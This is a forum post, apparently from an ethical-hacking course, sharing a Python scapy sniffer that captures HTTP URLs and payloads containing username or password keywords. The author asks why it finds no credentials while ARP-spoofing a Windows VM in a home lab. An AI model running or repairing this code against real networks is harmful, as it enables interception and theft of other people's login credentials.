Packet sniffer only captures login_info on own browser

Hello Zaid :slight_smile:

----------------------------------------------THE CODE:

#!/usr/bin/env python
import scapy.all as scapy
from scapy.layers import http

def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def get_url(packet):
return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path

def get_login_info(packet):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
keywords = [“username”, “user”, “password”, “pass”]
for keyword in keywords:
if keyword in load:
return load

def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request >> " + url)

    login_info = get_login_info(packet)
    if login_info:
        print("\n\n[+] Possible username/password > " + login_info + "\n\n")

sniff(“eth0”)


This program works as it should when using without arp spoofer, capturing in kali linux own browser. (no fun in that!)

But when i ARP SPOOF and run this program and browse in my WINDOWS VM, it only captures “HTTP Requests and the websites”. Not any login info from user fields or passwordfields.

This puzzles me, because it works fine running in own VM.

I have made sure to ip_forward and have checked to see if the Windows VM has been spoofed, as it has.

I need some advice :slight_smile: